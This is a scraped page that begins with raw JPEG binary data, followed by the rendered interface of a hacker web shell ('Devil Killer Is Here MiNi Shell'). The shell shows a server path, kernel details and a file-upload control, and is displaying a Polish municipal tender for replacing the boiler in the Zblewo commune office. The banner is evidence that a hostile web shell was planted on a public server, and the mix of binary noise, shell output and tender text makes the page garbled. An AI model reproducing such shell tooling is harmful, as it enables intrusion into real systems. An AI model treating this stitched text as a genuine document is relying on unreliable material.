JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250122/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250122/0005654201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana źródła ciepła w budynku Urzędu Gminy w Zblewie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZBLEWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675729</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Główna 40</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zblewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 588 43 81</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">58 588 45 67</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@zblewo.pl, zamowieniapubliczne@zblewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/zblewo</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana źródła ciepła w budynku Urzędu Gminy w Zblewie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38716be0-e0ef-4788-a00b-386e6914f2d0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00056542</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00025954/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wymiana źródła ciepła w budynku Urzędu Gminy w Zblewie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1050562 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między zamawiającym a wykonawcą, odbywać się będzie przy użyciu środków<br/>komunikacji elektronicznej, za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/zblewo. Zamawiający informuje, że instrukcje korzystania<br/>zplatformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści<br/>SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy<br/>użyciuplatformazakupowa.pl znajdują się w zakładce &#34;Instrukcje dla Wykonawców&#34; na stronie<br/>internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. Wyłącznie w sytuacjach<br/>awaryjnych z wyjątkiem składania ofert zamawiający dopuszcza komunikację elektroniczną poprzez<br/>email:zamowieniapubliczne@zblewo.pl lub gmina@zblewo.pl. Adres strony internetowej do<br/>komunikacji to:https://platformazakupowa.pl/pn/zblewo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zalecenia: 1. Rozszerzenia plików<br/>wykorzystywanych przez Wykonawców powinny być zgodne z<br/>załącznikiem nr 2 do „Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych&#34;, zwanego dalej Rozporządzeniem KRI.2.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze<br/>szczególnym wskazaniem na .pdf 3. W celu ewentualnej kompresji danych zamawiający rekomenduje<br/>wykorzystanie jednego z rozszerzeń:3.1. .zip 3.2. .7Z 4. Wśród rozszerzeń powszechnych a<br/>niewystępujących w rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną<br/>uznane za złożone nieskutecznie. 5. Zamawiający zwraca uwagę na<br/>ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi<br/>maksymalnie10MB,orazna ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej<br/>do składania podpisu osobistego, który wynosi maksymalnie 5MB. 6. W przypadku stosowania przez<br/>wykonawcę kwalifikowanego podpisu elektronicznego: 6.1. ze względu na niskie ryzyko naruszenia<br/>integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwościprzekonwertowanie plików składających się na ofertę na rozszerzenie .pdf i opatrzenie ich<br/>podpisem<br/>kwalifikowanym w formacie PAdES.6.2. pliki w innych formatach niż pdf zaleca się opatrzyć podpisem<br/>w formacie XAdES o typie zewnętrznym. Wykonawca powinien pamiętać, aby plik z podpisem<br/>przekazywać łącznie z dokumentem podpisywanym.6.3. Zamawiający rekomenduje wykorzystanie<br/>podpisu z kwalifikowanym znacznikiem czasu.7. Zamawiający zaleca aby w przypadku podpisywania<br/>pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami<br/>podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>8.Zamawiający zaleca, aby wykonawca z odpowiednim wyprzedzeniem przetestował możliwość<br/>prawidłowego wykorzystania wybranej metody podpisania plików oferty. 9. Osobą składającą ofertę<br/>powinna być osoba kontaktowa podawana w dokumentacji.10. Ofertę należy przygotować z należytą<br/>starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniem<br/>odpowiedniego odstępu czasu do zakończenia przyjmowania ofert. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert.11. Jeśli wykonawca pakuje dokumenty np. w plik o<br/>rozszerzeniu .zip zaleca się wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>12.Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich<br/>podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne<br/>będzie z koniecznością odrzuceniaoferty.13. Wykonawca, przystępując do niniejszego postępowania o<br/>udzielenie zamówieniapublicznego:13.1. akceptuje warunki korzystania z platformazakupowa.plokreślone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34;<br/>oraz uznaje go zawiążący,13.2. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej<br/>podlinkiem:https://drive.google.eom/file/d/1Kd1DttbBeiNWt4q4slS4t76IZVKPbkyD/view<br/>14. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania zplatformazakupowa.pl. 15. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie , w pkt. 7.9 SWZ określa<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27<br/>kwietnia 2016r. (Dz. Urz. UE L 119 z 04.05.2016) informuję, iż:<br/>1) Administratorem Pani/Pana danych osobowych jest Gmina Zblewo reprezentowana przez Wójta Gminy (o ile wskazują na to<br/>przepisy szczegółowe)<br/>2) Pani/Pana dane osobowe przetwarzane będą w celu realizacji ustawowych zadań urzędu - na podstawie art. 6 ust. 1 lit. c<br/>ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. oraz na podstawie art. 9 ust.1 lit. f i g ogólnego<br/>rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r.<br/>3) odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie<br/>przepisów prawa oraz podmioty związane z Administratorem umowami powierzenia przetwarzania danych osobowych<br/>4) Pani/Pana dane osobowe przechowywane będą w czasie określonym przepisami prawa, zgodnie z instrukcją kancelaryjną<br/>5) posiada Pani/Pan prawo żądania od Administratora:<br/>- dostępu do danych osobowych*,<br/>- prawo do ich sprostowania**,<br/>- usunięcia lub ograniczenia przetwarzania (w przypadkach przewidzianych prawem) ***,<br/>- prawo do wniesienia sprzeciwu wobec przetwarzania,<br/>- prawo do przenoszenia danych,<br/>- prawo do cofnięcia zgody w dowolnym momencie<br/>6) ma Pani/Pan prawo wniesienia skargi do organu nadzorczego<br/>7) podanie danych osobowych w zakresie wymaganym ustawodawstwem jest obligatoryjne<br/>8) Administrator Danych wyznaczył Inspektora Ochrony Danych, z którym skontaktować można się:<br/>- drogą elektroniczną: iod@zblewo.pl<br/>- telefonicznie: +48 58 588 43 81 w.38<br/>- osobiście w siedzibie Urzędzie Gminy w Zblewie przy ul. Głównej 40, 83-210 Zblewo.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez<br/>zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1-3 RODO, zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia.<br/>*skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników.<br/>prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze<br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RO.271.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Wymiana źródła ciepła w budynku Urzędu Gminy w Zblewie.<br/><br/>2.	Szczegółowy zakres zamówienia zawarty jest w Załączniku nr 8 do SWZ oraz pomocniczo w przedmiarze robót.<br/><br/><br/>I.	Przedmiotem zamówienia jest demontaż starego kotła na ekogroszek i dostawa wraz <br/>z montażem nowego kotła na pellet w kotłowni zlokalizowanej w budynku Urzędu Gminy <br/>w Zblewie <br/><br/>II.	Inwestycja będzie realizowana w: woj. pomorskim, powiat starogardzki, gmina Zblewo, obręb Zblewo. – istniejący budynek Urzędu Gminy w Zblewie<br/>Zamawiający udostępnia wraz z SIWZ przedmiary robót, które jednakże z uwagi na przyjętą formułę wynagrodzenia ryczałtowego mają wyłącznie walor informacyjno – pomocniczy.<br/><br/>Zamawiający zaleca wizytę w obiekcie przed złożeniem oferty w celu dokładnej analizy kosztów. <br/><br/>III.	Przedmiot zamówienia obejmuje:<br/>1.1.	Demontaż istniejącego kotła wraz ze zbędnym osprzętem, zezłomowanie oraz utylizacja. <br/>1.2.	Dostawę wraz z montażem kotła opalanego pelletem o mocy 150 kW, klasy 5, z certyfikatem ECODESIGN, wraz z oprzyrządowaniem, zasobnikiem i systemem transportu pelletu;. <br/> Wymagania technologiczne: <br/>•	sprawność pod pełnym obciążeniem – min. 90 % <br/>•	sprawność pod obciążeniem częściowym – min. 92 % <br/>•	regulacja powietrza pierwotnego i wtórnego <br/>•	dwuciągowy układ kotła z modulacją mocy <br/>•	automatyczny układ rozpalania <br/>•	automatyczne odpopielanie i oczyszczanie spalin<br/>•	obsługa i monitoring przez aplikację w telefonie<br/><br/>1.3.	Dostosowanie wyposażenia istniejącej kotłowni celem dostosowania do wymiany źródła zasilania<br/>1.4.	Sporządzenie i przekazanie Zamawiającemu 3 egz. dokumentacji powykonawczej, instrukcji obsługi i konserwacji oraz kompletu kart gwarancyjnych.<br/>1.5.	Przeprowadzenie pomiarów kontrolnych, przeprowadzenie prób instalacji, uruchomienie<br/>i regulacja instalacji (dot. instalacji C.O.);<br/>1.6.	Przeszkolenie użytkowników;<br/>1.7.	Usługa serwisowa przed rozpoczęciem sezonu grzewczego – 5 lat od terminu protokolarnego odbioru prac.<br/>1.8.	Utylizacja starego kotła oraz zdemontowanych materiałów;<br/>1.9.	Remont pomieszczenia kotłowni.<br/>•	demontaż 4 szt. istniejących drzwi i montaż 4 szt. nowych w tym 1 szt. PPOŻ – zewnętrzne<br/>•	wykonanie wylewki samopoziomującej/wyrównanie podłogi pod płytki<br/>•	ułożenie płytek ceramicznych na podłodze – płytki techniczne gładkie, matowe, antypoślizgowe<br/>•	wyrównanie ścian, skucie luźnych tynków, uzupełnienie ubytków <br/>•	ułożenie płytek ceramicznych – dwie ściany od 0,0 do 2,9 (pełna wysokość ściany) - płytki techniczne gładkie, matowe<br/>•	ułożenie płytek ceramicznych – dwie ściany od 0,0 do 1,5 - płytki techniczne gładkie, matowe<br/>•	malowanie dwóch ścian od 1,5 do 2,9 m (miejsca bez okładzin ściennych)<br/>•	wyrównanie, szpachlowanie i malowanie sufitu<br/>•	remont istniejącej kanalizacji zapobiegającej zalaniu kotłowni przez wody opadowe<br/>•	dostosowanie istniejącej instalacji sanitarnej i wodociągowej<br/>•	demontaż istniejących kanałów wentylacyjnych wraz z zamurowaniem otworów<br/>•	wymiana i montaż zlewu gospodarczego <br/>•	modernizacja instalacji elektrycznej<br/><br/>1.10.	Informacje dodatkowe: <br/>1)	Zasadne jest, aby Wykonawca zapoznał się z przedmiotem zamówienia oraz dokonał wizyty <br/>w obiekcie oraz zawarł w cenie oferty wszystkie koszty robót niezbędnych do prawidłowego ich wykonania, zgodnie z technologią określoną polskimi normami. <br/>2)	Wszystkie urządzenia i materiały muszą być fabrycznie nowe, wolne od wad fizycznych <br/>i prawnych.<br/>3)	Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką budowlaną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości robót prowadzonych u Zamawiającego. Wykonawca gwarantuje także wykonanie przedmiotu zamówienia pod kierownictwem osób posiadających wymagane przygotowanie zawodowe.<br/>4)	Wykonawca zabezpiecza teren robót w szczególności mając na uwadze mienie Zamawiającego i własne. <br/>5)	Wykonawca w trakcie trwania robót ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie przekazanego placu budowy <br/>z tytułu prowadzonych robót. <br/>6)	Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na ich zastosowanie (w szczególności: certyfikaty, atesty, aprobaty techniczne, świadectwa jakości lub inne dowody potwierdzające, że oferowany produkt jest zgodny z wymaganiami Zamawiającego). Zamawiający dopuszcza produkty nie mające certyfikatu zgodności z daną normą, oceną techniczną czy specyfikacją techniczną, o ile wyroby te lub produkty spełniają wymagania będące przedmiotem oceny tej zgodności a Wykonawca za pomocą innych dowodów może wykazać, że oferowany wyrób lub produkt jest zgodny z postawionymi wymogami. <br/>7)	Wykonawca wykona i przygotuje oraz złoży dokumenty na wykonany przedmiot zamówienia, <br/>a zwłaszcza: <br/>a)	potwierdzające jakość podstawowych materiałów i urządzeń użytych do wykonania przedmiotu zamówienia, <br/>b)	instrukcje użytkowania zamontowanych urządzeń (w języku polskim), <br/>c)	protokoły prób i sprawdzeń kotłowni i instalacji, <br/>d)	warunki gwarancji zamontowanych urządzeń. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331110-0 - Instalowanie kotłów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w SWZ, oraz spełniają określone przez Zamawiającego warunki udziału <br/>w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/>Opis sposobu spełnienia warunku:<br/>Warunek zostanie spełniony, jeżeli Wykonawca samodzielnie lub jeden z konsorcjantów, lub inny podmiot, na którego zdolnościach technicznych lub zawodowych polega Wykonawca wykaże, że:<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie minimum jedną robotę budowlaną podobną do robót objętych przedmiotem zamówienia, polegającą na wymianie kotła, modernizacji kotłowni wraz z instalacjami o wartości brutto nie mniejszej niż 100 000,00 zł. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest do złożenia następujących oświadczeń lub dokumentów:<br/>a. potwierdzających brak podstaw wykluczenia:<br/>1)	odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt. 4 